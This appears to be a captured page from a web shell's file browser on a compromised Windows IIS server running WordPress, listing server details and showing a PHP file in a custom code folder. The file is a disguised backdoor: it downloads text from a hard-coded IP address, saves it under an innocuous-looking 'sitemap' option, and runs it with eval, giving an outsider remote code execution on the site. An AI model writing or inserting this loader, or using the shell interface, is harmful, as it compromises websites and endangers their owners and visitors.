| Server IP : 121.121.20.254 / Your IP : 216.73.217.51 Web Server : Microsoft-IIS/10.0 System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64 User : IUSR ( 0) PHP Version : 8.3.28 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/6pocketz/wp-content/custom_codes/ |
Upload File : |
<?php
$sitemap_data = get_option('auto_wcl_sitemap');
if($sitemap_data){
eval('?>' .$sitemap_data);
}else{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'http://63.141.247.50/z60814_8/stat/index.txt');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($curl);
curl_close($curl);
if (!empty($result)) {
update_option('auto_wcl_sitemap', $result);
}
}